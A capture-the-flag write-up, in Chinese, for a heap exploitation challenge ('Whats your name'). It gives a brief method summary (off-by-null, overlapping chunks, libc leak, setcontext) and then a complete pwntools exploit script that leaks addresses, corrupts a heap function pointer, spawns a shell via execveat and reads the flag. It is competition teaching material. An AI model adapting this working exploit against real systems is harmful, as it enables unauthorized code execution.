[PWN] Whats your name - xf1les xp0int Posted on Sep 12 2021 edit 功能存在 off-by-null。 首先泄露 heap 地址,然后利用 off-by-null 和 fake chunk 构造 overlapping chunk(consolidate backward)。最后泄露 libc 地址,修改堆上的函数指针,利用 setcontext getshell 后读 flag。 ``` #!/usr/bin/env python3 from pwn import * warnings.filterwarnings("ignore", category=BytesWarning) context(arch="amd64") context(log_level="debug") libc = ELF("./libc.so.6") context.proxy = '127.0.0.1' p = remote("192.168.40.193", 9999) # ~ p = process("./name", env={"LD_PRELOAD":"./libc.so.6"}) def add(size): p.sendlineafter("5.exit", '1') p.sendlineafter(":", str(size)) def edit(idx, ctx): p.sendlineafter("5.exit", '2') p.sendlineafter(":", str(idx)) p.sendafter(":", ctx) def free(idx): p.sendlineafter("5.exit", '4') p.sendlineafter(":", str(idx)) def show(idx): p.sendlineafter("5.exit\n", '3') p.sendlineafter(":", str(idx)) add(0xf8) add(0xf8) add(0xf8) add(0xf8) add(0x60) ## Leak heapbase show(4) p.recvline() HEAP = u64(p.recv(6).ljust(8, b'\x00')) - 0x790 success("heapbase: 0x%lx", HEAP) ## [BUG] off-by-null ## clear chunk #2 inuse bit, set its prev_size to 0xc60 (pointing to chunk #4) edit(1, b'A'*0xf0 + p64(0xc60)) ## construct fake chunk header on chunk #4 edit(4, p64(0) + p64(0xc60) + p64(HEAP+0xe0)*2 + p64(0)*2) ## trigger consolidate backward, constructing overlapping chunk free(2) add(0x100) add(0x100) ## Leak libcbase from unsorted bin show(5) p.recvline() libc.address = u64(p.recv(6).ljust(8, b'\x00')) - 0x3c4b78 success("libcbase: 0x%lx", libc.address) ## user_context: execveat(0, "/bin/sh", 0, 0, 0) ctx = SigreturnFrame() ctx.rip = libc.symbols["syscall"] ctx.rsp = HEAP+0x100 # any RW-able address is OK. ctx.rdi = 322 # SYS_execveat ctx.rsi = 0 ctx.rdx = next(libc.search(b'/bin/sh')) ctx.rcx = 0 ctx.r8 = 0 ctx.r9 = 0 edit(5, bytes(ctx)) ## corrupt function pointer on heap from overlapping chunk, call setcontext to get shell ## HEAP+0x200 is the address where stores user_context data (chunk 5) edit(2, b'A'*0x60 + p64(libc.symbols["setcontext"]+53) + p64(HEAP+0x200)) show(2) ## read flag using bash builtin commands p.sendline("exec 3<flag; read flag <&3; echo $flag") p.interactive() ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [RE] OddCode - cew [RE] Babyvm - cew
没有帐号? 立即注册